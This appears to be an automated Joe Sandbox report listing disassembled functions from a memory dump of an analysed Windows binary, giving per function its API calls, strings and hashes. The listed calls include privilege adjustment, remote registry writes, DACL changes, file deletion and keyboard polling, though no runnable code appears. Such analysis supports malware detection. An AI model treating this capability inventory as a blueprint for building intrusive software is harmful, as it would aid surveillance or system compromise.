Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 3bd78e7a0735545626533812e3a323fa9ff56178da5dd7f8215be602e11b3739
Instruction ID: 158b8b252b0f31bd696a73c03a01818cbf53428e55320cfc2e5f993229435025
Opcode Fuzzy Hash: 3bd78e7a0735545626533812e3a323fa9ff56178da5dd7f8215be602e11b3739
Instruction Fuzzy Hash: 0C81587190020AAFDF519FA4DC45FFEBBB8EF04304F188169F910A6261EB758E54EB24

Function 000DC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000DC78D
FindClose.KERNEL32(00000000), ref: 000DC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000DC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000DC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 000DC844
__swprintf.LIBCMT ref: 000DC890
__swprintf.LIBCMT ref: 000DC8D3

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

__swprintf.LIBCMT ref: 000DC927

Part of subcall function 00093698: __woutput_l.LIBCMT ref: 000936F1

__swprintf.LIBCMT ref: 000DC975

Part of subcall function 00093698: __flsbuf.LIBCMT ref: 00093713
Part of subcall function 00093698: __flsbuf.LIBCMT ref: 0009372B

__swprintf.LIBCMT ref: 000DC9C4
__swprintf.LIBCMT ref: 000DCA13
__swprintf.LIBCMT ref: 000DCA62

Strings

%02d, xrefs: 000DC91B, 000DC925, 000DC973, 000DC9C2, 000DCA11, 000DCA60
%4d, xrefs: 000DC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 000DC88A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 9cd0e6dc84dee546cd53acf62c3c62762bc2ee4848e55ff7a6a2582fb21a8bb3
Instruction ID: 5892033718833700a585d8f71a35d0aec1c368e58a594a71958a3143f797d71e
Opcode Fuzzy Hash: 9cd0e6dc84dee546cd53acf62c3c62762bc2ee4848e55ff7a6a2582fb21a8bb3
Instruction Fuzzy Hash: B4A12FB1808305ABD750EF94C885DEFB7ECFF95704F408919F59986192EB34DA08CB66

Function 000DEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 000DEFB6
_wcscmp.LIBCMT ref: 000DEFCB
_wcscmp.LIBCMT ref: 000DEFE2
GetFileAttributesW.KERNEL32(?), ref: 000DEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 000DF00E
FindNextFileW.KERNEL32(00000000,?), ref: 000DF026
FindClose.KERNEL32(00000000), ref: 000DF031
FindFirstFileW.KERNEL32(*.*,?), ref: 000DF04D
_wcscmp.LIBCMT ref: 000DF074
_wcscmp.LIBCMT ref: 000DF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 000DF09D
SetCurrentDirectoryW.KERNEL32(00128920), ref: 000DF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 000DF0C5
FindClose.KERNEL32(00000000), ref: 000DF0D2
FindClose.KERNEL32(00000000), ref: 000DF0E4

Strings

*.*, xrefs: 000DF048

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 7a9195ccd2be281be9d8004f909e5381db89a2bfceceff7479d926997e5533b5
Instruction ID: 2916e1b0968d787df48da2cbee5d203aa3198d302ca7079828355a60b0b85931
Opcode Fuzzy Hash: 7a9195ccd2be281be9d8004f909e5381db89a2bfceceff7479d926997e5533b5
Instruction Fuzzy Hash: C031F53250131A6ADF54DBB4EC48AFE7BEC9F48360F108176E901D32A1DB74DA84DE65

Function 000F0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000F0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,000FF910,00000000,?,00000000,?,?), ref: 000F09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 000F0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 000F0A92
RegCloseKey.ADVAPI32(?), ref: 000F0DB2
RegCloseKey.ADVAPI32(00000000), ref: 000F0DBF

Strings

REG_SZ, xrefs: 000F0AD0
REG_EXPAND_SZ, xrefs: 000F0A2F
REG_MULTI_SZ, xrefs: 000F0B7A
REG_DWORD, xrefs: 000F0C83
REG_QWORD, xrefs: 000F0D00
REG_BINARY, xrefs: 000F0D4D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 43d33d52c77ea0ea8e96224734b82852c56b4693439a3978d39b1196a4f3b649
Instruction ID: 95f379b59eacab55a02a44db8877ba0b1cee159fb5dd11be2687b47aa22c6540
Opcode Fuzzy Hash: 43d33d52c77ea0ea8e96224734b82852c56b4693439a3978d39b1196a4f3b649
Instruction Fuzzy Hash: C10247756006019FCB54EF28C881E6AB7E5FF89710F04845DF99A9B7A2CB34EC01DB96

Function 000DF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 000DF113
_wcscmp.LIBCMT ref: 000DF128
_wcscmp.LIBCMT ref: 000DF13F

Part of subcall function 000D4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000D43A0

FindNextFileW.KERNEL32(00000000,?), ref: 000DF16E
FindClose.KERNEL32(00000000), ref: 000DF179
FindFirstFileW.KERNEL32(*.*,?), ref: 000DF195
_wcscmp.LIBCMT ref: 000DF1BC
_wcscmp.LIBCMT ref: 000DF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 000DF1E5
SetCurrentDirectoryW.KERNEL32(00128920), ref: 000DF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 000DF20D
FindClose.KERNEL32(00000000), ref: 000DF21A
FindClose.KERNEL32(00000000), ref: 000DF22C

Strings

*.*, xrefs: 000DF190

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: f6bc2d15e3734b69256350b3b19c23cae326b8f4a9f337de2ec5fc5569f8cc7b
Instruction ID: 336aaa447c88d8ba669327f6b1c933408d381850705ea6ebe4b942e7633ae9cb
Opcode Fuzzy Hash: f6bc2d15e3734b69256350b3b19c23cae326b8f4a9f337de2ec5fc5569f8cc7b
Instruction Fuzzy Hash: 1131F83A50131B6ADF209F64EC49EFE77AC9F49364F104176E801E22A1DB30DE85DA64

Function 000DA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000DA20F
__swprintf.LIBCMT ref: 000DA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 000DA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000DA293
_memset.LIBCMT ref: 000DA2B2
_wcsncpy.LIBCMT ref: 000DA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000DA323
CloseHandle.KERNEL32(00000000), ref: 000DA32E
RemoveDirectoryW.KERNEL32(?), ref: 000DA337
CloseHandle.KERNEL32(00000000), ref: 000DA341

Strings

\, xrefs: 000DA247
\??\%s, xrefs: 000DA22B
:, xrefs: 000DA252

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 5ce5aa2371ac70a9756eea3251ae5f9a2eab9ef165aeab356ce8172d32e8fd1e
Instruction ID: e84579d22ffcfbcf22a6e9d8b8f509bad8aec7b139e0afaeb5d79d671ff77348
Opcode Fuzzy Hash: 5ce5aa2371ac70a9756eea3251ae5f9a2eab9ef165aeab356ce8172d32e8fd1e
Instruction Fuzzy Hash: AE319F7260020AABDB209FA0DC49FFB37BDAF89700F1440B6F508D2161E77497449B25

Function 000C7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000C821E
Part of subcall function 000C8202: GetLastError.KERNEL32(?,000C7CE2,?,?,?), ref: 000C8228
Part of subcall function 000C8202: GetProcessHeap.KERNEL32(00000008,?,?,000C7CE2,?,?,?), ref: 000C8237
Part of subcall function 000C8202: HeapAlloc.KERNEL32(00000000,?,000C7CE2,?,?,?), ref: 000C823E
Part of subcall function 000C8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000C8255

Part of subcall function 000C829F: GetProcessHeap.KERNEL32(00000008,000C7CF8,00000000,00000000,?,000C7CF8,?), ref: 000C82AB
Part of subcall function 000C829F: HeapAlloc.KERNEL32(00000000,?,000C7CF8,?), ref: 000C82B2
Part of subcall function 000C829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000C7CF8,?), ref: 000C82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000C7D13
_memset.LIBCMT ref: 000C7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000C7D47
GetLengthSid.ADVAPI32(?), ref: 000C7D58
GetAce.ADVAPI32(?,00000000,?), ref: 000C7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000C7DB1
GetLengthSid.ADVAPI32(?), ref: 000C7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000C7DDD
HeapAlloc.KERNEL32(00000000), ref: 000C7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000C7E05
CopySid.ADVAPI32(00000000), ref: 000C7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000C7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000C7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000C7E77

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: ad0171c2114da80a2ae408bbcd26015100146b3ef6f726fd3db937d0341e357c
Instruction ID: b5aa67594873351fd29c97457791168e17887f0cf8b01c6062437955670e9383
Opcode Fuzzy Hash: ad0171c2114da80a2ae408bbcd26015100146b3ef6f726fd3db937d0341e357c
Instruction Fuzzy Hash: 5C61067290420AAFDF119FA4DC85EFEBBB9FF08300F048169F915A6291DB359A15DF60

Function 000866E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

LF), xrefs: 000C12A4
ANYCRLF), xrefs: 000C12FB
LIMIT_MATCH=, xrefs: 000C1170
UCP), xrefs: 000C110D
NO_START_OPT), xrefs: 000C114F
NO_AUTO_POSSESS), xrefs: 000C112E
UTF), xrefs: 000C10FA
CRLF), xrefs: 000C12C1
LIMIT_RECURSION=, xrefs: 000C11FC
BSR_ANYCRLF), xrefs: 000C131E
BSR_UNICODE), xrefs: 000C1338
ANY), xrefs: 000C12DE
UTF16), xrefs: 000C10CF
CR), xrefs: 000C1287

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 22aad81ea3c35a0f1e267f1f03748ac08d552ec333a35cc850cc30e8f268ce9a
Instruction ID: 7a25e3a4eabee7d02baef7e3ce4b17b145edd8bd7e671da69365c93d082e28d9
Opcode Fuzzy Hash: 22aad81ea3c35a0f1e267f1f03748ac08d552ec333a35cc850cc30e8f268ce9a
Instruction Fuzzy Hash: AC726F75E00219DBDB64DF58C880BEEB7F5FF45310F15816AE849EB291EB319A81CB90

Function 000D001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000D0097
SetKeyboardState.USER32(?), ref: 000D0102
GetAsyncKeyState.USER32(000000A0), ref: 000D0122
GetKeyState.USER32(000000A0), ref: 000D0139
GetAsyncKeyState.USER32(000000A1), ref: 000D0168
GetKeyState.USER32(000000A1), ref: 000D0179
GetAsyncKeyState.USER32(00000011), ref: 000D01A5
GetKeyState.USER32(00000011), ref: 000D01B3
GetAsyncKeyState.USER32(00000012), ref: 000D01DC
GetKeyState.USER32(00000012), ref: 000D01EA
GetAsyncKeyState.USER32(0000005B), ref: 000D0213
GetKeyState.USER32(0000005B), ref: 000D0221

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4c0528c1d6435ca5b9f19a6f22695e05f87ea2baa95b24a43154b064e7d6b958
Instruction ID: 9384c085a298822149a096d5c7ec9d5985d7655d359a0701dec7b7e3f105b663
Opcode Fuzzy Hash: 4c0528c1d6435ca5b9f19a6f22695e05f87ea2baa95b24a43154b064e7d6b958
Instruction Fuzzy Hash: 4951D534A0478829FB75DBA088547FABFF49F01380F08459B95CA576C3DAA49B8CC772

Function 000F03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000EFDAD,?,?), ref: 000F0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000F04AC

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000F054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000F05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000F0822
RegCloseKey.ADVAPI32(00000000), ref: 000F082F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: bcd1aeeddf566147ca8e9b36f2029e408501b361b6b33789fce405bbcbf4d391
Instruction ID: 1bfa02dd6831606df04581f4722f69e0d48d2c4fbe639cb9127b95d271be12cc
Opcode Fuzzy Hash: bcd1aeeddf566147ca8e9b36f2029e408501b361b6b33789fce405bbcbf4d391
Instruction Fuzzy Hash: 6CE16C70604205AFCB54DF28C895E7EBBE4FF89714F04856DF94ADB262DA30E901DB92

Function 000E4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 000E418B
EmptyClipboard.USER32 ref: 000E4191
GlobalAlloc.KERNEL32(00000002,?), ref: 000E41A6
CloseClipboard.USER32 ref: 000E4245

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 94b6f4c2b2dac7ec4ebaf58a0d6a51702d3590ac13824f44c957f66a22bd7c26
Instruction ID: 88a06151aa5800e68fdb95f1986efe81a6ba0fd35b4cae0a0866f4a2041b7858
Opcode Fuzzy Hash: 94b6f4c2b2dac7ec4ebaf58a0d6a51702d3590ac13824f44c957f66a22bd7c26
Instruction Fuzzy Hash: 7F21A1356002119FEB10AF25DC49B7E7BA8EF45711F108069F946EB2A2DF38AC40DB59

Function 000D37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00074750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00074743,?,?,000737AE,?), ref: 00074770

Part of subcall function 000D4A31: GetFileAttributesW.KERNEL32(?,000D370B), ref: 000D4A32

FindFirstFileW.KERNEL32(?,?), ref: 000D38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 000D394B
MoveFileW.KERNEL32(?,?), ref: 000D395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 000D397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 000D39B9

Strings

\*.*, xrefs: 000D384E, 000D3857, 000D386C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 63f72e943e69bbb98906d421b817461df8475c5b3aee69d20500652ee351b6dc
Instruction ID: 958a2c8e8662cc1d24d6b9ef84aff7bef423a62b6a63b67ed5ecad3f4ea8d5da
Opcode Fuzzy Hash: 63f72e943e69bbb98906d421b817461df8475c5b3aee69d20500652ee351b6dc
Instruction Fuzzy Hash: 7751A431C0524D9ACF15EBA0DD929FDB7B8AF15300F60806AE409B7292EF756F09CB65

Function 000DF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 000DF440
Sleep.KERNEL32(0000000A), ref: 000DF470
_wcscmp.LIBCMT ref: 000DF484
_wcscmp.LIBCMT ref: 000DF49F
FindNextFileW.KERNEL32(?,?), ref: 000DF53D
FindClose.KERNEL32(00000000), ref: 000DF553

Strings

*.*, xrefs: 000DF425

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 6cbf0fa914f1f4c1399f50b9652f4f16bd00ca633091efdcdc1204f39084ee49
Instruction ID: 567db7b5d74d31deb5330adb4fd2aee0960779d2ecb473f4f0c80d7a8d83c186
Opcode Fuzzy Hash: 6cbf0fa914f1f4c1399f50b9652f4f16bd00ca633091efdcdc1204f39084ee49
Instruction Fuzzy Hash: E1416D7190021A9BCF54DF64DC49AFEBBB4FF05350F14846AE91AA22A1DB349A84DB60

Function 00085760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000858A5
_memmove.LIBCMT ref: 000858F5
_memmove.LIBCMT ref: 0008595B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 463541ed1573cf055b77953abd525e963d0459e24e523597577c3a0a7648f700
Instruction ID: 93d03969414cfa61ec4701709fd53d74e6d76ab60b41acda3113e198a9c4a810
Opcode Fuzzy Hash: 463541ed1573cf055b77953abd525e963d0459e24e523597577c3a0a7648f700
Instruction Fuzzy Hash: 8D128A70A00609EFDF14DFA4D985AEEB7F5FF48300F108529E48AA7251EB36AD25CB54

Function 000D3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

